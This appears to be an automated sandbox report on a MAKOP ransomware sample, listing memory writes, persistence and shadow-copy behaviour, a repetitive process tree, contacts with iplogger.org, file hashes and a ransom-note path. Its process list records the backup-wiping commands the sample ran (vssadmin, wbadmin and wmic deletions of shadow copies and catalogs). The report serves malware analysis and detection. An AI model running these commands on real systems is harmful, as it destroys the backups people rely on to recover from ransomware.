PID 2700 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2700 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1736 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1296 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2768 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1392 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe" n2812

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 2.18.190.81:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 95.100.245.168:80 x2.c.lencr.org tcp

Files

\Users\Admin\AppData\Local\Temp\nso8B5F.tmp\System.dll

MD5 fccff8cb7a1067e23fd2e2b63971a8e1
SHA1 30e2a9e137c1223a78a0f7b0bf96a1c361976d91
SHA256 6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e
SHA512 f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c

memory/2812-7-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2812-10-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2812-9-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2812-16-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2812-26-0x0000000000400000-0x000000000041F000-memory.dmp

C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\readme-warning.txt

MD5 d171c561e20fc9714f85da3c4331d0b6
SHA1 8f7e6cd4bda627a0a3d1a0e687c8b998db3b9438
SHA256 3c829147b1f82f255e4032d2a22d5b83932bc7f74f3540137146530be0353aac
SHA512 b52823ac0dba9dec6a243d1a3d68718c2a825dae4d6f4f312e92d87ecb87dbb066f259b317628fa588ad1abc4a59e095e5e302e53294bd8b34d414fadc8420c2

C:\Users\Admin\AppData\Roaming\779389082

MD5 40b7f298d30296864906d4e175ff9f43
SHA1 349b60915d0ce78aacc57231ae1e0df151e20087
SHA256 2448a49c12e2c959a2f88d179c346a4d753725578a4755c8f8f487b1048fdcd4
SHA512 ed4c76fa8e4e0eb527f34ea6a25094ee8bdc343be1c0806bcb8baff3cd77e6944cee50125090a7fd8869951b53ced7dce4a48a197859a1e4616c7495390b36e7

memory/2812-2181-0x0000000000400000-0x000000000041F000-memory.dmp

